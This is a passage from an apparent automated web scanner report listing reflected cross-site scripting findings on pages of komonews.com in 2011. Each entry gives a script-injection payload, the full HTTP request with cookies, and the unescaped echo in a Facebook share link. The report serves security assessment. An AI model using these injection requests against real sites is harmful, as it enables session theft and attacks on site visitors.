Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55718

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   EPA to eas
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116736624.html?49136"><script>alert(1)</script>43c868099eb=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.58. http://www.komonews.com/news/national/116747399.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/national/116747399.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddaa9"><script>alert(1)</script>a2d335a52c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116747399.html?ddaa9"><script>alert(1)</script>a2d335a52c2=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 60578

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Americans
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116747399.html?ddaa9"><script>alert(1)</script>a2d335a52c2=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.59. http://www.komonews.com/news/national/116750534.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/national/116750534.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d14"><script>alert(1)</script>2c00cde6822 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116750534.html?38d14"><script>alert(1)</script>2c00cde6822=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57241

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Gov't reve
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116750534.html?38d14"><script>alert(1)</script>2c00cde6822=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.60. http://www.komonews.com/news/national/116750784.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/national/116750784.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d549"><script>alert(1)</script>6657e3e05de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116750784.html?8d549"><script>alert(1)</script>6657e3e05de=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54354

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Oil prices
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116750784.html?8d549"><script>alert(1)</script>6657e3e05de=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.61. http://www.komonews.com/news/offbeat/116565253.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116565253.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35879"><script>alert(1)</script>07658b738cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116565253.html?35879"><script>alert(1)</script>07658b738cd=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53461

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Stop or we
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116565253.html?35879"><script>alert(1)</script>07658b738cd=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.62. http://www.komonews.com/news/offbeat/116611588.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116611588.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f370e"><script>alert(1)</script>8e786bde4d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116611588.html?f370e"><script>alert(1)</script>8e786bde4d6=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Britain mu
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116611588.html?f370e"><script>alert(1)</script>8e786bde4d6=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.63. http://www.komonews.com/news/offbeat/116622758.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116622758.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d672"><script>alert(1)</script>4a6f14d0e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116622758.html?9d672"><script>alert(1)</script>4a6f14d0e5a=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u31-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57019

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Non-alcoho
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116622758.html?9d672"><script>alert(1)</script>4a6f14d0e5a=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.64. http://www.komonews.com/news/offbeat/116623473.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116623473.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc44"><script>alert(1)</script>5d6eef18dfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116623473.html?acc44"><script>alert(1)</script>5d6eef18dfc=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53376

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Hondurans
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116623473.html?acc44"><script>alert(1)</script>5d6eef18dfc=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.65. http://www.komonews.com/news/offbeat/116690659.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116690659.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa97f"><script>alert(1)</script>9a838f8e8f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116690659.html?aa97f"><script>alert(1)</script>9a838f8e8f3=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u31-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53372

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Mom gives
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116690659.html?aa97f"><script>alert(1)</script>9a838f8e8f3=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.66. http://www.komonews.com/news/offbeat/116708664.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116708664.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1809"><script>alert(1)</script>2d2f9577483 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116708664.html?d1809"><script>alert(1)</script>2d2f9577483=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53541

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Roommates'
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116708664.html?d1809"><script>alert(1)</script>2d2f9577483=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.67. http://www.komonews.com/news/offbeat/116708664.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116708664.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 109db"><script>alert(1)</script>99deb6313cc was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116708664.html?ref=guiltypleasures109db"><script>alert(1)</script>99deb6313cc HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53558

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Roommates'
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116708664.html?ref=guiltypleasures109db"><script>alert(1)</script>99deb6313cc" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.68. http://www.komonews.com/news/offbeat/116708719.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116708719.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82447"><script>alert(1)</script>4ea4956d695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116708719.html?82447"><script>alert(1)</script>4ea4956d695=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Big cleani
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116708719.html?82447"><script>alert(1)</script>4ea4956d695=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.69. http://www.komonews.com/news/offbeat/116708719.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116708719.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4ec"><script>alert(1)</script>245db4cf499 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116708719.html?ref=guiltypleasures2e4ec"><script>alert(1)</script>245db4cf499 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53679

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Big cleani
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116708719.html?ref=guiltypleasures2e4ec"><script>alert(1)</script>245db4cf499" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.70. http://www.komonews.com/news/offbeat/116749349.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116749349.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d36b8"><script>alert(1)</script>3f9817aad3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116749349.html?d36b8"><script>alert(1)</script>3f9817aad3=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Brazil fir
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116749349.html?d36b8"><script>alert(1)</script>3f9817aad3=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.71. http://www.komonews.com/news/offbeat/116749349.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/offbeat/116749349.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a7f6"><script>alert(1)</script>b8ce1649d07 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116749349.html?ref=guiltypleasures3a7f6"><script>alert(1)</script>b8ce1649d07 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Brazil fir
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116749349.html?ref=guiltypleasures3a7f6"><script>alert(1)</script>b8ce1649d07" href="http://www.facebook.com/sharer.php">
...[SNIP]...

